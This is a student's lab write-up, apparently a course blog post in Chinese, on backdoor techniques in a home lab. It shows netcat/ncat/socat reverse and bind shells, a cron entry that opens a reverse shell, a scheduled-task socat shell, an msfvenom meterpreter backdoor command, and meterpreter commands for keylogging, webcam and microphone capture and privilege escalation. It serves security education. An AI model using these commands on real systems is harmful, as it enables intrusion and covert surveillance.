20155334 曹翔 Exp2 后门原理与实践

不多废话直接上实验过程,本实验的所有端口都是5334。

一、实验过程

查询主机Windows和虚拟机kali的ip地址:

  1. Windows获得Linux Shell

    1. 使用ncat.exe程序监听本机的5334端口:
    2. 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5334端口:
    3. Windows下成功获得了一个Kali的shell,运行ls指令如下:
  2. Linux获得Windows Shell
    1. 使用 nc 指令监听端口:
    2. 在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的端口:
    3. Kali下可以看到Windows的命令提示,可以输入Windows命令:
  3. 使用nc传输数据
    1. Windows下监听端口:
    2. Kali下连接到Windows的端口:
    3. 建立连接之后,就可以传输数据了:

  4. 使用ncat实现文件传输
    1. 如图所示,先在windows中打开监听,然后在linux系统中发送文件:

    2. 文件保存在C:\Users\DELL\Desktop\ncat中:
  5. 使用netcat获取主机操作Shell,cron启动
    1. 先在Windows系统下监听端口:
    2. 在Kali环境下用 crontab -e 编辑定时任务,选择编辑器也只会用vim了呀:
    3. 在最后一行添加 N * * * * /bin/netcat 172.168.3.2 5334 -e /bin/sh ,意思是在每个小时的第N分钟反向连接Windows主机的端口,就会启动cron。此处的我取N=48
    4. 当时间到指定分钟,就已经获得了Kali的shell:
  6. 使用socat获取主机操作Shell, 任务计划启动(此处本人主机Win8.1系统出现问题,打开任务计划程序的时候显示 找不到远程电脑 经过查询相关资料发现要将网络设置重置,为了防止出现以后上不了网的意外,就选择了新装win7的虚拟机,继续实验)
    1. 在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:

    2. 下载安装socat软件,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数(可选)一栏填写 tcp-listen:5334 exec:cmd.exe,pty,stderr ,作用是把cmd.exe绑定到端口5334,同时把cmd.exe的stderr重定向到stdout上:

    3. 创建完成之后,可以发现之前创建的任务已经开始运行:

    4. 此时,在Kali环境下输入指令 socat - tcp:172.168.3.2:5334 ,此时可以发现已经成功获得了一个cmd shell:
      ##### 很遗憾,截图没有 (:з」∠),我也很难过T_T

重头戏来了:

  1. 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    1. 输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=5334 -f exe > 5334_backdoor.exe 生成后门程序5334_backdoor.exe
    2. 通过nc指令将生成的后门程序传送到Windows主机上:
    3. 在Kali上使用 msfconsole 指令进入msf控制台,MSF打开监听进程设置payload,设置反弹回连的IP和端口:
    命令 作用
    use exploit/multi/handler 进入handler模式
    set payload windows/meterpreter/reverse_tcp 设置payload
    show options 查看当前信息状态
    set LHOST 设置LHOST
    set LPORT 设置LPORT
    exploit MSF开始监听

    1. 设置完成后,执行监听:
    2. 打开Windows上的后门程序:
    3. 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
  2. 使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
命令 作用
record_mic 截获一段音频
webcam_snap 使用摄像头进行拍照
webcam stream 使用摄像头进行录像
screenshot 截屏
keyscan_start 开始记录下击键的过程
keyscan_dump 读取击键的记录
getuid 查看当前用户
getsystem 进行提权

想看使用摄像头拍的照片么?就不给你看,怕吓坏你······好吧,其实是我用的Win7虚拟机并没有使用电脑主机摄像头的驱动,所以就没有啦啦啦啦,
不过特别想看的话,诺,给你咯

不要怀疑,这就是我,嗯。

摄像头获取

二、实验中遇到的问题及解决

问题1:打开任务计划程序的时候显示找不到远程电脑
解决办法:应急办法选择了新装win7的虚拟机,后续解决办法将网络设置重置即可。

问题2:提权失败
解决办法:使用管理员权限运行windows里的,从kali传过去的后台程序5334_backdoor.exe。

三、问题回答:

  1. 例举你能想到的一个后门进入到你系统中的可能方式?
    答:最常见的就是通过软件安装包的捆绑,此外还有以前学习信息安全技术基础时学到的将后台程序和文件一起制成压缩包,在解压的时候安装植入。

  2. 例举你知道的后门如何启动起来(win及linux)的方式?
    答:windows:启动任务计划程序、开机自启动、捆绑运行(这些360都能解决哎)linux:通过在cron中添加任务(目前就知道这一个,噗)。

  3. Meterpreter有哪些给你映像深刻的功能?
    答:当然是获取摄像头啦,还有获取麦克风,这俩结合起来简直·····嗯······,喂喂,想啥呢??我说的可以当监控使用。

  4. 如何发现自己有系统有没有被安装后门?
    答:当然是360大法好啦,当然也不能总是依靠这些软件,还有别的方法,比如······腾讯电脑管家??

四、实验总结与体会

总的来说,这次实验带给我太多的感触和震撼,不得不说,这些后门软件的威力不容小觑,即使是最简单的,最低级的后门软件,都能实现这些看起很难实现,却的的确确发生的功能。很难想象在安全软件没有普及的时候,人们上网的风险有多高。这次实验让我更加的感谢360,要不是它首先免费·····额,应该是感谢老师,要不是您,我还不能够深刻的了解到这些后门程序的危害,我是认真的。

20155334 曹翔 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  2. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  5. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  6. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  7. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  8. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  9. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

随机推荐

  1. MySql 正则表达式简介及使用

    MySql正则表达式简介及使用 by:授客 QQ:1033553122 简介 正则表达式描述了一组字符串,该字符放置于REGEXP工具后面.作用是将一个正则表达式与一个文本串进行比较. 最简单的正则表 ...

  2. 安卓socket聊天

    安卓基于Socket通信(服务器配合) 1.话不多说进入正题,先创建服务端,在Android Studio中创建Java代码,如下图所示: 选择Java Library 需要改名字的自己随意 2.创建 ...

  3. [iOS]圆形进度条及计时功能

    平时用战网安全令的时候很喜欢圆形倒计时的效果,然后简单看了一下Android的圆形进度条,后来又写了一个IOS的.整体界面参照IOS系统的倒计时功能,顺便熟悉了UIPickerView的一些特性的实现 ...

  4. 学习vue.js的正确姿势(转载)

    最近饶有兴致的又把最新版 Vue.js 的源码学习了一下,觉得真心不错,个人觉得 Vue.js 的代码非常之优雅而且精辟,作者本身可能无 (bu) 意 (xie) 提及这些.那么,就让我来吧:) 程序 ...

  5. beego快速入门

    beego的官方网址:https://beego.me 参考文档:https://beego.me/quickstart 1:安装 您需要安装 Go 1.1+ 以确保所有功能的正常使用. 需要已经设置 ...

  6. Mongodb集群——master/slave

    集群的配置 (本测试放于同一台机器进行配置,所以IP地址一样,如果是在不同的服务器上更换IP便可以)   1.目录结构       拷贝两份mongodb到/home/scotte.ye/mongo1 ...

  7. Android应用耗电量统计,无需USB连接

    Android应用耗电量统计一直是一个很头疼的问题,手工统计耗时太长,自动化统计又不是非常精准(执行自动化代码需要通过USB连接,而USB又会充电,这就造成统计数据不准).后来从前辈那里得知可以通过a ...

  8. SQL Server 当表分区遇上唯一约束(转载)

    一.前言 我已经在高兴对服务器创建了表分区并且获得良好性能和自动化管理分区切换的时候,某一天,开发人员告诉我,某表的两个字段的数据不唯一,需要为这两个字段创建唯一索引的时候,这一切就变得不完美了.列的 ...

  9. 参数innodb_force_recovery影响了整个InnoDB存储引擎的恢复状况

    参数innodb_force_recovery影响了整个InnoDB存储引擎的恢复状况.该值默认为0,表示当需要恢复时执行所有的恢复操作.当不能进行有效恢复时,如数据页发生了corruption,My ...

  10. 转:在网站开发中很有用的8个 jQuery 效果【附源码】

    原文地址:http://www.cnblogs.com/lhb25/p/amazing-jquery-effects.html jQuery 作为最优秀 JavaScript 库之一,改变了很多人编写 ...